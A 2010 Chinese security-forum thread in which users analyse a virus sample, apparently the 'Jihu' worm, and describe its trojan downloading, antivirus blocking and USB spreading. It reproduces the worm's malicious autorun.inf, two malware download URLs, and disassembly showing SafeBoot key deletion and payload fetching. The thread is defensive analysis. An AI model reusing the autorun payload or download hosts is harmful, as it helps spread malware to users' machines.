12   1  /  2  页   跳转

[问题/讨论] “极虎”病毒样本的简单分析

收藏
辛达星郁
头像
锋芒艾服狮
  • 帖子:1507
  • 注册: 2008-07-17
  • 来自:
就爱不长大论坛9周年纪念
发表于: 2010-02-10 23:46 | 只看楼主 短消息 资料
字号: 1楼

“极虎”病毒样本的简单分析

一.样本信息
样本名称:8.exe
样本大小:243KB
MD5:ccbe1775eb280c1b6187628534fc34da
病毒链接:
http://bbs.ikaka.com/showtopic-8695511-4.aspx
(病毒样本在35楼)
当时还以为是那个“极虎”病毒呢!!
http://bbs.ikaka.com/showtopic-8695965.aspx
看此帖子,越来越感觉这个病毒就是“极虎”了,自己之所不敢发到技术交流区,上面那个“极虎”分析帖子就是说明了一切。
我很想知道人家是怎么分析的,这个帖子和那个帖子差距太远了。
二.中毒现象
在虚拟机下联网的状态下运行此病毒,

 附件: 您所在的用户组无法下载或查看附件


运行之后会自动消失



 附件: 您所在的用户组无法下载或查看附件
随后系统慢慢会感觉很卡,此时的病毒正在链接网络下载病毒木马,并且在临时文件夹里生成数字和字母的随机文件,



 附件: 您所在的用户组无法下载或查看附件
观察的时候,不时的会有文件的创建,并且还会自动删除。
随后,利用工具查看系统进程,发现如下可疑:
这里说明一下,那个进程是正常的文件,压缩包里这个文件是正常的,只不过病毒是调用这个进程。
(说到这,自己问题出来了,对系统里的一些正常文件还是熟悉不到位)



 附件: 您所在的用户组无法下载或查看附件
按照文件路径一看:



 附件: 您所在的用户组无法下载或查看附件
很明显是病毒所创建的,在此文件夹是没有此文件的。
使用Windows清理助手,升级到最新版,进行扫描得知:

 附件: 您所在的用户组无法下载或查看附件

 附件: 您所在的用户组无法下载或查看附件




最后打开SRE日志工具:

 附件: 您所在的用户组无法下载或查看附件

 附件: 您所在的用户组无法下载或查看附件




最后,我看到有很多安全杀毒的进程被劫持,我就尝试一下访问瑞星杀毒软件的官网,还有卡卡助手的官网,发现都被屏蔽了,都不能打开,这里我就疑惑了是怎么屏蔽的,一般病毒屏蔽网页,一般采用修改HOST里文件,但是在扫描出日志后我发现哪里并没有修改,随后我又看看浏览器是否出问题,我并没有发现异常,主页也没有被修改,我猜测很有可能是IE浏览器程序被替换,但是我不确定。



 附件: 您所在的用户组无法下载或查看附件
更让我没有想到的是,此病毒还通过U盘传播,这个很巧合,在虚拟机里测试病毒,一般我是不查U盘,谁知就这么一查就利用上了,发现此病毒的另一种传播方式。
此病毒传播的时候,在U盘里自动创建3个文件,





 附件: 您所在的用户组无法下载或查看附件

 附件: 您所在的用户组无法下载或查看附件
那个734文件里的东西我很疑惑!

 附件: 您所在的用户组无法下载或查看附件


那个假冒伪劣的回收站里的文件就是病毒文件了。

 附件: 您所在的用户组无法下载或查看附件
那个autorun.inf这个文件大家应该熟悉不过了。
代码如下:
[autorun]
OPEN=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe
shell\open=打开(&O)
shell\open\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe Show
shell\open\Default=1//
shell\explore=资源管理器(&X)
shell\explore\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe Show
这个U盘的里的病毒我也中招了,但是我看没有啥变化,不知道这病毒葫芦里卖的什么药。下面的病毒文件我打包上传。
还有就是我把那几个U盘的可疑文件删除了,但是唯有一个734(病毒创建的文件名)文件没有删除,点击右键删除没有任何反应,并且属性也没有办法改掉。





 附件: 您所在的用户组无法下载或查看附件

 附件: 您所在的用户组无法下载或查看附件
三.手工清除
此病毒我看也不怎么流行,我就不怎么说明具体查杀方法了,下面打包上传我扫描日志,留给大家练习,还以用来做PLA工具的实验品。

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; InfoPath.2)

附件附件:

您所在的用户组无法下载或查看附件

最后编辑辛达星郁 最后编辑于 2010-02-11 13:25:17
要深入,要专一.......
分享到:
gototop
 
辛达星郁
头像
锋芒艾服狮
  • 帖子:1507
  • 注册: 2008-07-17
  • 来自:
就爱不长大论坛9周年纪念
发表于: 2010-02-10 23:53 | 只看楼主 短消息 资料
字号: 2楼

回复: 对一个病毒样本的简单分析



引用:
原帖由 辛达星郁 于 2010-2-10 23:46:00 发表
一.样本信息
样本名称:8.exe
样本大小:243KB
MD5:ccbe1775eb280c1b6187628534fc34da
病毒链接:
[url=http://bbs.ikaka.com/showtopic-8695511-4.aspx]http://bbs.ikaka.com/sh

第一个是测试病毒样本,
第二个是传播到我U盘里的病毒样本。
解压密码都是:123
第三个是扫描的日志

附件附件:

您所在的用户组无法下载或查看附件

附件附件:

您所在的用户组无法下载或查看附件

附件附件:

您所在的用户组无法下载或查看附件

最后编辑辛达星郁 最后编辑于 2010-02-10 23:57:43
要深入,要专一.......
gototop
 
happysunday2003
头像
叱咤花甲狮
  • 帖子:4313
  • 注册: 2007-08-15
  • 来自:358团
论坛8周年活动礼物
发表于: 2010-02-10 23:58 | 短消息 资料
字号: 3楼

回复:对一个病毒样本的简单分析

好久没有像楼主这样了。

楼主加油。。

送你一句话:“你是个人才啊!”
gototop
 
ty88
头像
卡卡反病毒小组
  • 帖子:979
  • 注册: 2007-07-12
  • 来自:
论坛8周年活动礼物论坛9周年纪念瑞星金牌用户
发表于: 2010-02-10 23:58 | 短消息 资料
字号: 4楼

回复:对一个病毒样本的简单分析

我指出一个问题
那个RAR.EXE是正常文件任何安装WINRAR的机器都有,进程里面出现只不过是因为病毒调用了RAR.EXE来感染压缩包内的EXE
gototop
 
辛达星郁
头像
锋芒艾服狮
  • 帖子:1507
  • 注册: 2008-07-17
  • 来自:
就爱不长大论坛9周年纪念
发表于: 2010-02-11 00:03 | 只看楼主 短消息 资料
字号: 5楼

回复: 对一个病毒样本的简单分析



引用:
原帖由 ty88 于 2010-2-10 23:58:00 发表
我指出一个问题
那个RAR.EXE是正常文件任何安装WINRAR的机器都有,进程里面出现只不过是因为病毒调用了RAR.EXE来感染压缩包内的EXE


 附件: 您所在的用户组无法下载或查看附件
蒙了 ,确实是,今天的那个帖子新浪哥还说来这没有注意到。。。
要深入,要专一.......
gototop
 
ty88
头像
卡卡反病毒小组
  • 帖子:979
  • 注册: 2007-07-12
  • 来自:
论坛8周年活动礼物论坛9周年纪念瑞星金牌用户
发表于: 2010-02-11 00:04 | 短消息 资料
字号: 6楼

回复:对一个病毒样本的简单分析

病毒下载
http://67.159.35.100:8080/Down/xx.rar
和http://67.159.35.85:8080/Down/33.rar
gototop
 
随缘92WJC
头像
横据古稀狮
  • 帖子:12667
  • 注册: 2009-01-13
  • 来自:
论坛8周年活动礼物祖国六十华诞论坛9周年纪念09欢乐圣诞10温馨圣诞十周年年度风云人物国庆61周年十一周年勋章
发表于: 2010-02-11 00:10 | 短消息 资料
字号: 7楼

回复:对一个病毒样本的简单分析

唉,虚拟机没装系统
不敢实机测试,近400G的资料都没刻盘····
毁了就完了
gototop
 
辛达星郁
头像
锋芒艾服狮
  • 帖子:1507
  • 注册: 2008-07-17
  • 来自:
就爱不长大论坛9周年纪念
发表于: 2010-02-11 00:10 | 只看楼主 短消息 资料
字号: 8楼

回复: 对一个病毒样本的简单分析



引用:
原帖由 ty88 于 2010-2-11 0:04:00 发表
病毒下载
http://67.159.35.100:8080/Down/xx.rar
http://67.159.35.85:8080/Down/33.rar

你这两个下载地址怎么截获的,我怎么没有弄到....
最后编辑辛达星郁 最后编辑于 2010-02-11 00:14:43
要深入,要专一.......
gototop
 
ty88
头像
卡卡反病毒小组
  • 帖子:979
  • 注册: 2007-07-12
  • 来自:
论坛8周年活动礼物论坛9周年纪念瑞星金牌用户
发表于: 2010-02-11 00:22 | 短消息 资料
字号: 9楼

回复:对一个病毒样本的简单分析

00406963  |.  68 409B4000  push    00409B40                        ; /SubKey = "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal"
00406968  |.  68 02000080  push    80000002                        ; |hKey = HKEY_LOCAL_MACHINE
0040696D  |.  FF15 F4914000 call    dword ptr [<&SHLWAPI.SHDeleteKey>; \SHDeleteKeyA
00406973  |.  68 749B4000  push    00409B74                        ; /SubKey = "SYSTEM\CurrentControlSet\Control\SafeBoot\Network"
00406978  |.  68 02000080  push    80000002                        ; |hKey = HKEY_LOCAL_MACHINE
0040697D  |.  FF15 F4914000 call    dword ptr [<&SHLWAPI.SHDeleteKey>; \SHDeleteKeyA

00407601  .  68 2CC84000  push    0040C82C                        ; /<%s> = "Down/0.exe"
00407606  .  8D45 B0      lea    eax, dword ptr [ebp-50]          ; |
00407609  .  50            push    eax                              ; |<%s>
0040760A  .  68 409E4000  push    00409E40                        ; |Format = "http://%s/%s"
0040760F  .  8D85 A8FEFFFF lea    eax, dword ptr [ebp-158]        ; |
00407615  .  50            push    eax                              ; |s
00407616  .  FF15 10924000 call    dword ptr [<&USER32.wsprintfA>]  ; \wsprintfA


这东东动作挺多的。。。
gototop
 
辛达星郁
头像
锋芒艾服狮
  • 帖子:1507
  • 注册: 2008-07-17
  • 来自:
就爱不长大论坛9周年纪念
发表于: 2010-02-11 00:35 | 只看楼主 短消息 资料
字号: 10楼

回复:对一个病毒样本的简单分析

反汇编,用代码分析病毒。。。
天啊,这是我梦寐以求的分析病毒方式。
要深入,要专一.......
gototop
 
<<上一主题|下一主题>>
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT